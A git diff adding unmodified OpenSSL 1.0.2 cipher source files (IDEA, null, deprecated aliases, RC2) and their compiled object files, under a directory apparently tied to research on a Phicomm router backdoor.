+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_IDEA
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include "evp_locl.h"
+# include <openssl/idea.h>
+
+static int idea_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                         const unsigned char *iv, int enc);
+
+/*
+ * NB idea_ecb_encrypt doesn't take an 'encrypt' argument so we treat it as a
+ * special case
+ */
+
+static int idea_ecb_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                           const unsigned char *in, size_t inl)
+{
+    BLOCK_CIPHER_ecb_loop()
+        idea_ecb_encrypt(in + i, out + i, ctx->cipher_data);
+    return 1;
+}
+
+/* Can't use IMPLEMENT_BLOCK_CIPHER because idea_ecb_encrypt is different */
+
+typedef struct {
+    IDEA_KEY_SCHEDULE ks;
+} EVP_IDEA_KEY;
+
+BLOCK_CIPHER_func_cbc(idea, idea, EVP_IDEA_KEY, ks)
+    BLOCK_CIPHER_func_ofb(idea, idea, 64, EVP_IDEA_KEY, ks)
+    BLOCK_CIPHER_func_cfb(idea, idea, 64, EVP_IDEA_KEY, ks)
+
+    BLOCK_CIPHER_defs(idea, IDEA_KEY_SCHEDULE, NID_idea, 8, 16, 8, 64,
+                  0, idea_init_key, NULL,
+                  EVP_CIPHER_set_asn1_iv, EVP_CIPHER_get_asn1_iv, NULL)
+
+static int idea_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                         const unsigned char *iv, int enc)
+{
+    if (!enc) {
+        if (EVP_CIPHER_CTX_mode(ctx) == EVP_CIPH_OFB_MODE)
+            enc = 1;
+        else if (EVP_CIPHER_CTX_mode(ctx) == EVP_CIPH_CFB_MODE)
+            enc = 1;
+    }
+    if (enc)
+        idea_set_encrypt_key(key, ctx->cipher_data);
+    else {
+        IDEA_KEY_SCHEDULE tmp;
+
+        idea_set_encrypt_key(key, &tmp);
+        idea_set_decrypt_key(&tmp, ctx->cipher_data);
+        OPENSSL_cleanse((unsigned char *)&tmp, sizeof(IDEA_KEY_SCHEDULE));
+    }
+    return 1;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_idea.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_idea.o
new file mode 100644
index 0000000000000000000000000000000000000000..33cbb6dda6506d8ed487bb3ac7168383e15cae4d
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`ES5JBqyu_1=c1is}^dNy!dlB(c5HFIXi%Q7{%?8?w{sn)I$NnXM
zfzBkmxNK4n9hkhGx9`nPHtomY?zZJPpu>S1_^UJv@MVyGN&C=&Er4Oaf9)QQ!XlA{
zd&SSV*X>;vW!ZZ_^|*I_RMAzhHo`XM8s_kR1TBCCaSZdnpyS){{nMmjjT2K(?A{P;
z$!V;ds%~JgUMG=ZI8iOc^V?ViJObePJeEO-D5n*^>Xj5T349#L0C<?^z@s#dMS@(C
zO2P4By15LZiK<_cf@jk-6H_^_9k?2?hc>!X`_23%?TpV~D)#Y7oc-PWa<~4l{Rb%7
z#9Y;Xf?n$BVVdEq;@Bi{t<TqZVQ{8&Viv|)`!qGc#RjJR3(J(iRj7g9)eP!qdujhu
qi53dUr<15%#p6G(c6YS(pa$(Iod$dU9o(?*p0rO&_^6EvZT~OCML4qn

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_null.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_null.c
new file mode 100644
index 0000000..599fcb8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_null.c
@@ -0,0 +1,100 @@
+/* crypto/evp/e_null.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+
+static int null_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                         const unsigned char *iv, int enc);
+static int null_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                       const unsigned char *in, size_t inl);
+static const EVP_CIPHER n_cipher = {
+    NID_undef,
+    1, 0, 0,
+    0,
+    null_init_key,
+    null_cipher,
+    NULL,
+    0,
+    NULL,
+    NULL,
+    NULL,
+    NULL
+};
+
+const EVP_CIPHER *EVP_enc_null(void)
+{
+    return (&n_cipher);
+}
+
+static int null_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                         const unsigned char *iv, int enc)
+{
+    /*      memset(&(ctx->c),0,sizeof(ctx->c)); */
+    return 1;
+}
+
+static int null_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                       const unsigned char *in, size_t inl)
+{
+    if (in != out)
+        memcpy((char *)out, (const char *)in, inl);
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_null.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_null.o
new file mode 100644
index 0000000000000000000000000000000000000000..2517dcaf93d6bb676a1cfe0d2bb5bf461f27dd0f
GIT binary patch
literal 2024
zcmbtUL2DCH5T4Dpwo0{8Jct#^K_sGiq*|2rAc0yNL8KHay@gF&O=+?Tn+-HQXb)a`
z5c~-q{1G0-9=v)Ie}>YV2z9>Qne_Fs2<pIQzWH{(dGlu9%d3^g4-1}0Y98IE<49Se
z^29N&rLab`bdC;Zum1c1!2wWx|9gG^Ykl!kGFjjMeE8ma^JWsNgH-DL<gMqV{C&8(
zyu4H@Z#0KdGAu2cJEmHhzc)<7`Ion=rn+z=qqEZ3UXdSkx%y;-3Pc~l`TW2xW{$kw
zb@FzK-rUU8^jmHmnk(||jCgQW!I#BD|3L7J_&+(!WP*Mi<>mOfUkJTww<lFTS8@%#
z7OXnj`z7Hu*8Z<C@1@hpDs5&i{q-&0qPd%CI~-%5PLHt-e9~2I7W<kyNpMu*=K^<x
zzF^~-hK*?0>6jM5HMXLyq_G{2vZ%GyZ-+5O4FM}p*BW8eN)=fdx+$K&f7<=8qs%ZD
z7`_YMsg(pMuRBm4xpw}7<SVcFb%)n|kr|A-Nzi1U#F=j^io;G|l5i&>^DIaLGR?t&
zOv)k#GI7szdaa;Crq%0q!-#XEUJ@EU<CQ@Yw6-OF5e-d0?)Aes8A*+>-FO}c-B3FF
zKUZQoW^~FaQ<GTli@rv#ZF3yp6xVE$aZ!%Eejl6zX!YbNe_eR@hV+@wGk5)4oP?VH
zs=v!x)O7WG%)#vYgt&ws%jOy9?Y}Gqb$-}C{=?k;KVlB+YaYYYzKPd!FJYPstaDhm
zu;#$~nqZTRUAoB}Zn1qAAeolL5(3M#f2DRAAl22EMeokf)el*lH@{7pUtJc${BS2#
xujeOkZAkWH{WbAtnZx7i@sH<zd#31%Y-kCAWm0a;oM)7$e<$SYab^Zw{cnC@fuR5Z

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_old.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_old.c
new file mode 100644
index 0000000..c93f5a5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_old.c
@@ -0,0 +1,164 @@
+/* crypto/evp/e_old.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifdef OPENSSL_NO_DEPRECATED
+static void *dummy = &dummy;
+#else
+
+# include <openssl/evp.h>
+
+/*
+ * Define some deprecated functions, so older programs don't crash and burn
+ * too quickly.  On Windows and VMS, these will never be used, since
+ * functions and variables in shared libraries are selected by entry point
+ * location, not by name.
+ */
+
+# ifndef OPENSSL_NO_BF
+#  undef EVP_bf_cfb
+const EVP_CIPHER *EVP_bf_cfb(void);
+const EVP_CIPHER *EVP_bf_cfb(void)
+{
+    return EVP_bf_cfb64();
+}
+# endif
+
+# ifndef OPENSSL_NO_DES
+#  undef EVP_des_cfb
+const EVP_CIPHER *EVP_des_cfb(void);
+const EVP_CIPHER *EVP_des_cfb(void)
+{
+    return EVP_des_cfb64();
+}
+
+#  undef EVP_des_ede3_cfb
+const EVP_CIPHER *EVP_des_ede3_cfb(void);
+const EVP_CIPHER *EVP_des_ede3_cfb(void)
+{
+    return EVP_des_ede3_cfb64();
+}
+
+#  undef EVP_des_ede_cfb
+const EVP_CIPHER *EVP_des_ede_cfb(void);
+const EVP_CIPHER *EVP_des_ede_cfb(void)
+{
+    return EVP_des_ede_cfb64();
+}
+# endif
+
+# ifndef OPENSSL_NO_IDEA
+#  undef EVP_idea_cfb
+const EVP_CIPHER *EVP_idea_cfb(void);
+const EVP_CIPHER *EVP_idea_cfb(void)
+{
+    return EVP_idea_cfb64();
+}
+# endif
+
+# ifndef OPENSSL_NO_RC2
+#  undef EVP_rc2_cfb
+const EVP_CIPHER *EVP_rc2_cfb(void);
+const EVP_CIPHER *EVP_rc2_cfb(void)
+{
+    return EVP_rc2_cfb64();
+}
+# endif
+
+# ifndef OPENSSL_NO_CAST
+#  undef EVP_cast5_cfb
+const EVP_CIPHER *EVP_cast5_cfb(void);
+const EVP_CIPHER *EVP_cast5_cfb(void)
+{
+    return EVP_cast5_cfb64();
+}
+# endif
+
+# ifndef OPENSSL_NO_RC5
+#  undef EVP_rc5_32_12_16_cfb
+const EVP_CIPHER *EVP_rc5_32_12_16_cfb(void);
+const EVP_CIPHER *EVP_rc5_32_12_16_cfb(void)
+{
+    return EVP_rc5_32_12_16_cfb64();
+}
+# endif
+
+# ifndef OPENSSL_NO_AES
+#  undef EVP_aes_128_cfb
+const EVP_CIPHER *EVP_aes_128_cfb(void);
+const EVP_CIPHER *EVP_aes_128_cfb(void)
+{
+    return EVP_aes_128_cfb128();
+}
+
+#  undef EVP_aes_192_cfb
+const EVP_CIPHER *EVP_aes_192_cfb(void);
+const EVP_CIPHER *EVP_aes_192_cfb(void)
+{
+    return EVP_aes_192_cfb128();
+}
+
+#  undef EVP_aes_256_cfb
+const EVP_CIPHER *EVP_aes_256_cfb(void);
+const EVP_CIPHER *EVP_aes_256_cfb(void)
+{
+    return EVP_aes_256_cfb128();
+}
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_old.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_old.o
new file mode 100644
index 0000000000000000000000000000000000000000..d427203b430baf295a1bf3ec153ef7780359df19
GIT binary patch
literal 2792
zcmb`J%TH556vn3%1r-EQq6TBSKqD$QZFys&<!uZKDi{}<+Q&r_fs*z%0T=2*6PKEp
z=+eXu3m3XKk^exK?sV%?-5C@7zS}u;7>A8|lDTuvZ@x2kI<MRNW0T`Gk%$tDsI#gX
z2~}#XuIi^kH>Da?gZj~Q^ygQ`|I1MmBO`;c6SLX!Qc#W!cwJt+GtpNL!^FL0+>3X2
zRB$+oT0EOkcA!jLnpHJQt&>GjXa_2lirl@TA}h_2wuZX;C-{NPIilNk>6$F=V51Ip
z-N6<d?16(lbFejwaoq1LrbB1NHLF$MHe8KS=ZbQUWR|vOMbVSXqH3oLqZeay7>cN>
zH=?Q=4Ogog)8iVn7~_;R;XH6%Y&!|y;(g%kNAjf}*+zd^>swIMM4yH4>c0%m{@W;q
ziT)9Mm;O08_3aeHME?rDOaB&}`c8^rqJIzHrT+j<eJ{l@(SL^T(tii1{v5?H(bwoR
zQK8jmD>(J%H4^=?ZS=}d7Z&nfPK{lgPG{%Rxw))LPfSh?4^5`0#>cOY&7^0Bh9}3;
zhM>1Q4Dx;{lrvNNMvI^KyS6k7*s8H5jJ2YeOK!GmU$^8krJ!fCZ8OrX8H_8D?B8rR
zV&HJ-AsVQ5Z^Wh~+0(nF7adc=`-{etw+H3dM#c6L!pIv@gdZe?kvE|TkHM#r??VyZ
zK?oz?k0Lxt2qSMr5q^dcM$UH$A0>p5A4U;=kq}1CvmrbNpN4xmEMb60w|0cfzLI?=
zT+ZbUOE2ed+2ZXwerRzyPcJMk=jOG=<$SDLT*jxo(&}Q6$)XO5m3m&hqQ8*w0)Hh?
zUOp3Kl$R})l$R?kF8WJgONGGq@U7}B1)1C(9p7Fmd&|YbvR@2Vl^6El&!^{#nMGfZ
z;NPkk()o?BZ}1ctjrX8w)SAZm=GvxA2>-F(xSurNjheY~^B>auxaRg3=c#VDEBpPY
zAz+_>o1Z`~`;4QQChtFGLiqB2sRs>aO641EGWwDy`~n<)CAqInTh~F%gz#nl1ZUx}
zPdopM7JSsTRCfMNG`QC9mfjHN`Y~7XW&K?5=DXhLANo=cjCU8$vYk(6uN{z@=AdBx
Y)`VGMc$c~I`}JQB`R`Tf?a%rD4StLy2LJ#7

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc2.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc2.c
new file mode 100644
index 0000000..718cc86
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc2.c
@@ -0,0 +1,235 @@
+/* crypto/evp/e_rc2.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_RC2
+
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include "evp_locl.h"
+# include <openssl/rc2.h>
+
+static int rc2_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                        const unsigned char *iv, int enc);
+static int rc2_meth_to_magic(EVP_CIPHER_CTX *ctx);
+static int rc2_magic_to_meth(int i);
+static int rc2_set_asn1_type_and_iv(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
+static int rc2_get_asn1_type_and_iv(EVP_CIPHER_CTX *c, ASN1_TYPE *type);
+static int rc2_ctrl(EVP_CIPHER_CTX *c, int type, int arg, void *ptr);
+
+typedef struct {
+    int key_bits;               /* effective key bits */
+    RC2_KEY ks;                 /* key schedule */
+} EVP_RC2_KEY;
+
+# define data(ctx)       ((EVP_RC2_KEY *)(ctx)->cipher_data)
+
+IMPLEMENT_BLOCK_CIPHER(rc2, ks, RC2, EVP_RC2_KEY, NID_rc2,
+                       8,
+                       RC2_KEY_LENGTH, 8, 64,
+                       EVP_CIPH_VARIABLE_LENGTH | EVP_CIPH_CTRL_INIT,
+                       rc2_init_key, NULL,
+                       rc2_set_asn1_type_and_iv, rc2_get_asn1_type_and_iv,
+                       rc2_ctrl)
+# define RC2_40_MAGIC    0xa0
+# define RC2_64_MAGIC    0x78
+# define RC2_128_MAGIC   0x3a
+static const EVP_CIPHER r2_64_cbc_cipher = {
+    NID_rc2_64_cbc,
+    8, 8 /* 64 bit */ , 8,
+    EVP_CIPH_CBC_MODE | EVP_CIPH_VARIABLE_LENGTH | EVP_CIPH_CTRL_INIT,
+    rc2_init_key,
+    rc2_cbc_cipher,
+    NULL,
+    sizeof(EVP_RC2_KEY),
+    rc2_set_asn1_type_and_iv,
+    rc2_get_asn1_type_and_iv,
+    rc2_ctrl,
+    NULL
+};
+
+static const EVP_CIPHER r2_40_cbc_cipher = {
+    NID_rc2_40_cbc,
+    8, 5 /* 40 bit */ , 8,
+    EVP_CIPH_CBC_MODE | EVP_CIPH_VARIABLE_LENGTH | EVP_CIPH_CTRL_INIT,
+    rc2_init_key,
+    rc2_cbc_cipher,
+    NULL,
+    sizeof(EVP_RC2_KEY),
+    rc2_set_asn1_type_and_iv,
+    rc2_get_asn1_type_and_iv,
+    rc2_ctrl,
+    NULL
+};
+
+const EVP_CIPHER *EVP_rc2_64_cbc(void)
+{
+    return (&r2_64_cbc_cipher);
+}
+
+const EVP_CIPHER *EVP_rc2_40_cbc(void)
+{
+    return (&r2_40_cbc_cipher);
+}
+
+static int rc2_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                        const unsigned char *iv, int enc)
+{
+    RC2_set_key(&data(ctx)->ks, EVP_CIPHER_CTX_key_length(ctx),
+                key, data(ctx)->key_bits);
+    return 1;
+}
+
+static int rc2_meth_to_magic(EVP_CIPHER_CTX *e)
+{
+    int i;
+
+    EVP_CIPHER_CTX_ctrl(e, EVP_CTRL_GET_RC2_KEY_BITS, 0, &i);
+    if (i == 128)
+        return (RC2_128_MAGIC);
+    else if (i == 64)
+        return (RC2_64_MAGIC);
+    else if (i == 40)
+        return (RC2_40_MAGIC);
+    else
+        return (0);
+}
+
+static int rc2_magic_to_meth(int i)
+{
+    if (i == RC2_128_MAGIC)
+        return 128;
+    else if (i == RC2_64_MAGIC)
+        return 64;
+    else if (i == RC2_40_MAGIC)
+        return 40;
+    else {
+        EVPerr(EVP_F_RC2_MAGIC_TO_METH, EVP_R_UNSUPPORTED_KEY_SIZE);
+        return (0);
+    }
+}
+
+static int rc2_get_asn1_type_and_iv(EVP_CIPHER_CTX *c, ASN1_TYPE *type)
+{
+    long num = 0;
+    int i = 0;
+    int key_bits;
+    unsigned int l;
+    unsigned char iv[EVP_MAX_IV_LENGTH];
+
+    if (type != NULL) {
+        l = EVP_CIPHER_CTX_iv_length(c);
+        OPENSSL_assert(l <= sizeof(iv));
+        i = ASN1_TYPE_get_int_octetstring(type, &num, iv, l);
+        if (i != (int)l)
+            return (-1);
+        key_bits = rc2_magic_to_meth((int)num);
+        if (!key_bits)
+            return (-1);
+        if (i > 0 && !EVP_CipherInit_ex(c, NULL, NULL, NULL, iv, -1))
+            return -1;
+        EVP_CIPHER_CTX_ctrl(c, EVP_CTRL_SET_RC2_KEY_BITS, key_bits, NULL);
+        EVP_CIPHER_CTX_set_key_length(c, key_bits / 8);
+    }
+    return (i);
+}
+
+static int rc2_set_asn1_type_and_iv(EVP_CIPHER_CTX *c, ASN1_TYPE *type)
+{
+    long num;
+    int i = 0, j;
+
+    if (type != NULL) {
+        num = rc2_meth_to_magic(c);
+        j = EVP_CIPHER_CTX_iv_length(c);
+        i = ASN1_TYPE_set_int_octetstring(type, num, c->oiv, j);
+    }
+    return (i);
+}
+
+static int rc2_ctrl(EVP_CIPHER_CTX *c, int type, int arg, void *ptr)
+{
+    switch (type) {
+    case EVP_CTRL_INIT:
+        data(c)->key_bits = EVP_CIPHER_CTX_key_length(c) * 8;
+        return 1;
+
+    case EVP_CTRL_GET_RC2_KEY_BITS:
+        *(int *)ptr = data(c)->key_bits;
+        return 1;
+
+    case EVP_CTRL_SET_RC2_KEY_BITS:
+        if (arg > 0) {
+            data(c)->key_bits = arg;
+            return 1;
+        }
+        return 0;
+# ifdef PBE_PRF_TEST
+    case EVP_CTRL_PBE_PRF_NID:
+        *(int *)ptr = NID_hmacWithMD5;
+        return 1;
+# endif
+
+    default:
+        return -1;
+    }
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc2.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_rc2.o
new file mode 100644
index 0000000000000000000000000000000000000000..4bfc89cbdd998f9bd2582b6935e910096454fc41
GIT binary patch
literal 7352
zcmb`Le{2)i9l+1Afvm8L*R9AC3{0DD&LCb)>6Xxv`Vu>N9tU{&0b%`dB*u`4;AGAv
zGu;G8CRC@?Wz+sa+CNb>P1Am8Osh89Y&04D0UO-_O>5WEHLH+XaMy0?fNXTI@AuvN
zn)8btiNaU9d+&YTd*5I0-T9sOMfH{nmrEgWDUHgF7Ewhx>bp@7^J-Y}DpksdRm=XX
zb!r{a(D}}GmVK{&I~()d8-Nkaic|+elkDY4wHGI_(aTi_UgaJCi&>Z6MP?n(&Ui<B
zEO!^Sj{OpDEVmBpyj#yjs-e@Y_F8|{tq*kTcRDDowEM=O)^J?2UKsuogSt06v({Xh
